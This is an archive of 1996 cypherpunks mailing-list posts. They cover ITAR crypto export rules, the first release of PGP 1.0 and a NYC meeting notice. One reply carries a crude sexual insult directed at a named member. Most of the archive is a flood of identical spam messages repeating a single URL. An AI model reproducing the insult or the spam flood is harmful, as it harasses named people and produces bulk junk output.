In-Reply-To: <Pine.BSF.3.91.961214151814.24935C-100000@mcfeely.bsfs.org>
Message-ID: <a1DyyD1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Rabid Wombat <wombat@mcfeely.bsfs.org> writes:
>
> and a Happy Chanukah to to Dimitri ...
>

Thank you, Womb [aren't you afraid that Timmy May will mailbomb you for
insufficient anti-Semitism unbecoming a "cypher punk"], and a joyous Kwanza
to Red Rackham, and a spermy holiday to John Gilmore (swallow, don't spit).

*=============================================================================*
|                                                                             |
|                                                                      *****  |
|                                                                       ***   |
|    ****                                                                *    |
|   *                                                **                       |
|   *                                                  *       *   *    ***   |
|   *                                                  *  ***  ** **    ***   |
|    ****                               ***         **** *   * * * *          |
|                                          *  ***  *   * *   * *   *          |
|                 *                     ***  *   * *   *  ***                 |
|                * *          *   *    *     *   *  ***                       |
|                *     *    * ** **    *   *  ***                             |
|   *    *       ****  ***  * * * *     ***                                   |
|   *    *  ***  *   * *  * * *   *                  1    999    999 777      |
|   *    * *   * *   *  **  *                        1   9  9   9  9   7      |
|   ****** *   *  ***                                1    999    999   7      |
|   *    *  ***                                      1      9      9   7      |
|   *    *                                           1    999    999   7      |
|                                                                             |
|*****************************************************************************|

*%\@/*%$%*\@/*%$%*\@/*%$%*\@/*%$%*\^/*%$%*\@/*%$%*\@/*%$%*\@/*%$%*\@/*%*
*  X   !   X   !   X   !   X   !   .   !   X   !   X   !   X   !   X   *
*      O       O       O       O  .|.  O       O       O       O       *
*                                 -*-                                  *
*   Athbhliain Faoi Mhaise!       '|`           _    Happy New Year!   *
*   Frohliche Weihnachten!        *:*          ("D     Chag Sameach!   *
*   Sarbatori Fericite!          * . *        ~(=r      Boas Festas!   *
*   Joyous Solstice!            **   **    .../__\       Gut Yontif!   *
*   Mele Kurisumasu!          *** o   ***     [MJ]       Iyi YIllar!   *
*   Mele Kalikimaka!           *\    O *             Wesolych Swiat!   *
*   Merry Christmas!          ** \\    **            Velelykh Svyat!   *
*   Happy Hanukkah!         ***    \\   ***        Stastny Novy Rok!   *
*   Pari Dzounount!          * o     \\  *        Kelemes Unnepeket!   *
*   Happy Holidays!         **    O    \\**      Season's Greetings!   *
*   Veseli Vanoce!        ***\\       o  \***     Gung Hay Fat Choy!   *
*   Feliz Navidad!         *   \\  o       *       Felican Jarfinon!   *
*   Joyeux Noel!          **  o  \\    O   **       Joy to the World   *
*   Bom Natal!         ****        \\     o ****      - And to All a   *
*   God Jul!             ** o     o  \\ o   **           Good Night!   *
*   Cheers!            ***     O       \\    ***                       *
*   *:D       o_     *****************************      e@@@@@@@@@@@@@@@
*     _      <' )~      ___      #####  _v_            @@@"""""""""""""*
*    /<~    ["""] V  o [___] _@_ #####__|~|_ A        @" ___ ___________
*   %'=    @|HHH|[~] U |\ /|/^^^\##[{}{}{}{](") !    II__[w] | [i] [z] |
*  %' )   /%|HHH||$|/V\|XXX|~~~~~##[}{}{}{}](:)<*>  {======|_|~~~~~~~~~|
* %(__6 |==D|HHH||$|\^/|/ \|=====##[{}{}{}{](:) V  /oO--000'"`-OO---OO-'
************************************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sat, 14 Dec 1996 17:23:36 -0800 (PST)
To: Adam Shostack <junger@pdj2-ra.F-REMOTE.CWRU.Edu (Peter D. Junger)
Subject: Re: ITARs effects
In-Reply-To: <199612141904.OAA07254@pdj2-ra.F-REMOTE.CWRU.Edu>
Message-ID: <v03007803aed902ffd819@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:09 pm -0500 12/14/96, Adam Shostack wrote:
>	My understanding is that they choose not to continue
>per^H^Hrosecuting Phil for putting the code up for FTP.  Thus, this is
>a change.  Or did Phil not put the code up for FTP?

Actually, it's my understanding that PRZ didn't do it personally. Someone
else got the code from Phil and put it on the net. Phil had nothing to do
with it. Except for writing PGP, of course. :-).

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"The cost of anything is the foregone alternative" -- Walter Johnson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 14 Dec 1996 17:45:22 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: ITARs effects
Message-ID: <1.5.4.32.19961215014204.00679fac@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Adam Shostack wrote:

>Peter D. Junger wrote:
>| That has always been the position of the Department of Defense Trade
>| Controls with respect to the ITAR, the only difference is that now
>| it is going to be in writing.
>
>My understanding is that they choose not to continue
>prosecuting Phil for putting the code up for FTP.  Thus, this is
>a change.  Or did Phil not put the code up for FTP?
---------

What was never certain in Phil's case, I believe, is how the
code got out of the US. Whether it was deliberately sent outside the
US by someone, or just made available on a US site which was 
accessible from outside the US.

The TIA lawyer who wrote me about TR453 indicated that there has
been legal dispute about whether mere placement of ITAR-regulated 
code on a US site, accessible from outside the US, means that
the code has been exported by the person placing it there (as I did
with the CAVE code on an AOL server in Virginia), or whether the
export is done by an accessor who is usually not be subject to US law.

The new regs intend to close that loophole, as Peter Junger states, and
as the TIA lawyer also indicated, that is, to codify the illegality of putting 
such code on a site accessible from "outside" the US, or by a "non-US 
person" inside the US. Heretofore, regulation has been by jaw-boning 
(as the TIA lawyer jaw-boned me about copyright villation of the 
uncopyrighted TR453).

This is the point about two definitions of geography in conflict -- physical
and 
electronic -- and how state-oriented law is attempting to assert control of the 
cyber-dissolving national borders. Similar to the struggle over electronic 
dissolution of intellectual property.

As a speaker noted in a recent Congressional crypto hearing: government-
aggressive law of cyberspace aims to define a nation's borders well beyond 
physical territory. As similarly argued against allowing "non-US persons" to
study regulated crypto in Professor Junger's class.

As others have noted here, other loopholes of by electronic reality 
are being closed by the new regs, even if First Amendment transgression 
follows.

But I'm not sure that the lawyers are not condemned to trail the leading 
edge of technology, as ever -- in crypto-munitions as in First Amendment 
and intellectual property betrayals, misrepresentations and rear guard actions.

Reading the new crypto export regs and comparing them to earlier incarnations 
is instructive. Observe those insertions of bits and bytes of contortinate 
intellectual labor -- never quite able to get the legilation to fit all the
looming 
permutations of technology -- unable, that is, to stitch the wounds of the 
stumbling, flailing superpower, unsure where the foe is located who is mortally 
undermining faith in the physical prowess of the keepers of the privileges.

Those vaunted inside secrets of nuclear-munitioned cops don't sell so well 
these days when the donut-dippers cannot be sure how to distinguish insiders 
from outsiders, and whose really in control of the armaments keys of keys.

Whole lot of shifting of alliances going on, from State to Commerce, or so I 
read in the quagmire regs.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Sat, 14 Dec 1996 18:35:29 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: ITARs effects (fwd)
Message-ID: <199612150254.UAA02959@einstein>
MIME-Version: 1.0
Content-Type: text



Hi all,

Forwarded message:

> Date: Sat, 14 Dec 1996 18:02:49 -0800
> From: "Timothy C. May" <tcmay@got.net>
> Subject: Re: ITARs effects
> 
> I certainly can't speak for Phil, but according to everything I have heard,
> and according to several articles that have been written about the events
> surrounding the release of PGP 1.0, Phil most definitely DID NOT place the
> PGP 1.0 software on any kind of ftp site.
> 
> (I believe that at that time, circa 1991, Phil did not even have any kind
> of ISP or university Internet access which would have even made this
> possible for him. In fact, I believe it was not until around 1993 that he
> had a stable e-mail account.)

I believe the first site to carry PGP 1.0 was Adelante BBS in Colorado where
Phil was living at the time. I was a user of that site when 1.0 was put
online and made publicaly available. I still have the Amiga disk those files
were d/l'ed on.

Somebody should ask Phil if he put v1.0 on any sites prior to Adelante.

                                                  Jim Choate
                                                  CyberTects
                                                  ravage@ssz.com

Best wishes and happy holidays to you all.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Marc J. Wohler" <mwohler@ix.netcom.com>
Date: Sat, 14 Dec 1996 17:55:41 -0800 (PST)
To: cypherpunks@toad.com
Subject: NYC Area Cypherpunks meeting
Message-ID: <3.0.32.19961214204533.006bb744@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

The NewYork City area Cypherpunks will meet on the UpperWest Side of
Manhattan.
Date: Thursday 12/19/96
Time: 7:30 PM
Place: The Club. Park Royal Hotel, 23 West 73rd Street. Between Columbus &
Amsterdam Avenue.
Subway stops: 72nd & Broadway #1 #9 #2 #3 (express stop)
	           72nd & Central Park West  A or D trains
Refreshments: BYOB & snacks. We can order out for dinner.

All our welcome but please email me your intention to attend (if you have
not already done so.)

Marc	

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMqsDk2eikzgqLB7pAQHxFgP9FbdXYo4qiubH9zBFW+CdQb5LZVxKAhWB
EwfV+2EquVT94dokYMN9P0n26ZIozJejpXf44QLLgNPvWHqHB8Wult/U7zyVeVid
1YVRftVFnxPlBjkabH5yGR8efP7L2i5Ynh5X8I0jFy9G8Wfilxsg8QT8r+eYtDWB
g/b4Wpr0/0w=
=CIyV
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Zer0.Faith.Inc.@website.chek.it.out
Date: Sat, 14 Dec 1996 22:12:02 -0800 (PST)
To: <Admin@bexcol.demon.co.uk>
Subject: www.geocities.com/SiliconValley/Heights/2608
Message-ID: <199612150213.VAA07590@cps1.starwell.com>
MIME-Version: 1.0
Content-Type: text/plain


www.geocities.com/SiliconValley/Heights/2608
www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.co
m/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/H
eights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.
geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/Sil
iconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Height
s/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geoci
ties.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconV
alley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/260
8www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.c
om/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/
Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Zer0.Faith.Inc.@website.chek.it.out
Date: Sat, 14 Dec 1996 22:13:47 -0800 (PST)
To: <Admin@bexcol.demon.co.uk>
Subject: www.geocities.com/SiliconValley/Heights/2608
Message-ID: <199612150213.VAA07593@cps1.starwell.com>
MIME-Version: 1.0
Content-Type: text/plain


www.geocities.com/SiliconValley/Heights/2608
www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.co
m/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/H
eights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.
geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/Sil
iconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Height
s/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geoci
ties.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconV
alley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/260
8www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.c
om/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/
Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Zer0.Faith.Inc.@website.chek.it.out
Date: Sat, 14 Dec 1996 22:12:05 -0800 (PST)
To: <Admin@bexcol.demon.co.uk>
Subject: www.geocities.com/SiliconValley/Heights/2608
Message-ID: <199612150213.VAA07596@cps1.starwell.com>
MIME-Version: 1.0
Content-Type: text/plain


www.geocities.com/SiliconValley/Heights/2608
www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.co
m/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/H
eights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.
geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/Sil
iconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Height
s/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geoci
ties.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconV
alley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/260
8www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.c
om/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/
Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Zer0.Faith.Inc.@website.chek.it.out
Date: Sat, 14 Dec 1996 22:12:10 -0800 (PST)
To: <Admin@bexcol.demon.co.uk>
Subject: www.geocities.com/SiliconValley/Heights/2608
Message-ID: <199612150213.VAA07599@cps1.starwell.com>
MIME-Version: 1.0
Content-Type: text/plain


www.geocities.com/SiliconValley/Heights/2608
www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.co
m/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/H
eights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.
geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/Sil
iconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Height
s/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geoci
ties.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconV
alley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/260
8www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.c
om/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/
Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Zer0.Faith.Inc.@website.chek.it.out
Date: Sat, 14 Dec 1996 22:15:41 -0800 (PST)
To: <Admin@bexcol.demon.co.uk>
Subject: www.geocities.com/SiliconValley/Heights/2608
Message-ID: <199612150213.VAA07602@cps1.starwell.com>
MIME-Version: 1.0
Content-Type: text/plain


www.geocities.com/SiliconValley/Heights/2608
www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.co
m/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/H
eights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.
geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/Sil
iconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Height
s/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geoci
ties.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconV
alley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/260
8www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.c
om/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/
Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Zer0.Faith.Inc.@website.chek.it.out
Date: Sat, 14 Dec 1996 22:13:57 -0800 (PST)
To: <Admin@bexcol.demon.co.uk>
Subject: www.geocities.com/SiliconValley/Heights/2608
Message-ID: <199612150213.VAA07605@cps1.starwell.com>
MIME-Version: 1.0
Content-Type: text/plain


www.geocities.com/SiliconValley/Heights/2608
www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.co
m/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/H
eights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.
geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/Sil
iconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Height
s/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geoci
ties.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconV
alley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/260
8www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.c
om/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/
Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Zer0.Faith.Inc.@website.chek.it.out
Date: Sat, 14 Dec 1996 22:12:13 -0800 (PST)
To: <Admin@bexcol.demon.co.uk>
Subject: www.geocities.com/SiliconValley/Heights/2608
Message-ID: <199612150213.VAA07609@cps1.starwell.com>
MIME-Version: 1.0
Content-Type: text/plain


www.geocities.com/SiliconValley/Heights/2608
www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.co
m/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/H
eights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.
geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/Sil
iconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Height
s/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geoci
ties.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconV
alley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/260
8www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.c
om/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/
Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Zer0.Faith.Inc.@website.chek.it.out
Date: Sat, 14 Dec 1996 22:12:17 -0800 (PST)
To: <Admin@bexcol.demon.co.uk>
Subject: www.geocities.com/SiliconValley/Heights/2608
Message-ID: <199612150214.VAA07612@cps1.starwell.com>
MIME-Version: 1.0
Content-Type: text/plain


www.geocities.com/SiliconValley/Heights/2608
www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.co
m/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/H
eights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.
geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/Sil
iconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Height
s/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geoci
ties.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconV
alley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/260
8www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.c
om/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/
Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Zer0.Faith.Inc.@website.chek.it.out
Date: Sat, 14 Dec 1996 22:12:20 -0800 (PST)
To: <Admin@bexcol.demon.co.uk>
Subject: www.geocities.com/SiliconValley/Heights/2608
Message-ID: <199612150214.VAA07615@cps1.starwell.com>
MIME-Version: 1.0
Content-Type: text/plain


www.geocities.com/SiliconValley/Heights/2608
www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.co
m/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/H
eights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.
geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/Sil
iconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Height
s/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geoci
ties.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconV
alley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/260
8www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.c
om/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/
Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Zer0.Faith.Inc.@website.chek.it.out
Date: Sat, 14 Dec 1996 22:12:25 -0800 (PST)
To: <Admin@bexcol.demon.co.uk>
Subject: www.geocities.com/SiliconValley/Heights/2608
Message-ID: <199612150214.VAA07618@cps1.starwell.com>
MIME-Version: 1.0
Content-Type: text/plain


www.geocities.com/SiliconValley/Heights/2608
www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.co
m/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/H
eights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.
geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/Sil
iconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Height
s/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geoci
ties.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconV
alley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/260
8www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.c
om/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/
Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Zer0.Faith.Inc.@website.chek.it.out
Date: Sat, 14 Dec 1996 22:12:30 -0800 (PST)
To: <Admin@bexcol.demon.co.uk>
Subject: www.geocities.com/SiliconValley/Heights/2608
Message-ID: <199612150214.VAA07621@cps1.starwell.com>
MIME-Version: 1.0
Content-Type: text/plain


www.geocities.com/SiliconValley/Heights/2608
www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.co
m/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/H
eights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.
geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/Sil
iconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Height
s/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geoci
ties.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconV
alley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/260
8www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.c
om/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/
Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Zer0.Faith.Inc.@website.chek.it.out
Date: Sat, 14 Dec 1996 22:12:46 -0800 (PST)
To: <Admin@bexcol.demon.co.uk>
Subject: www.geocities.com/SiliconValley/Heights/2608
Message-ID: <199612150214.VAA07629@cps1.starwell.com>
MIME-Version: 1.0
Content-Type: text/plain


www.geocities.com/SiliconValley/Heights/2608
www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.co
m/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/H
eights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.
geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/Sil
iconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Height
s/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geoci
ties.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconV
alley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/260
8www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.c
om/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/
Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Zer0.Faith.Inc.@website.chek.it.out
Date: Sat, 14 Dec 1996 22:12:52 -0800 (PST)
To: <Admin@bexcol.demon.co.uk>
Subject: www.geocities.com/SiliconValley/Heights/2608
Message-ID: <199612150214.VAA07636@cps1.starwell.com>
MIME-Version: 1.0
Content-Type: text/plain


www.geocities.com/SiliconValley/Heights/2608
www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.co
m/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/H
eights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.
geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/Sil
iconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Height
s/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geoci
ties.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconV
alley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/260
8www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.c
om/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/
Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Zer0.Faith.Inc.@website.chek.it.out
Date: Sat, 14 Dec 1996 22:13:05 -0800 (PST)
To: <Admin@bexcol.demon.co.uk>
Subject: www.geocities.com/SiliconValley/Heights/2608
Message-ID: <199612150214.VAA07644@cps1.starwell.com>
MIME-Version: 1.0
Content-Type: text/plain


www.geocities.com/SiliconValley/Heights/2608
www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.co
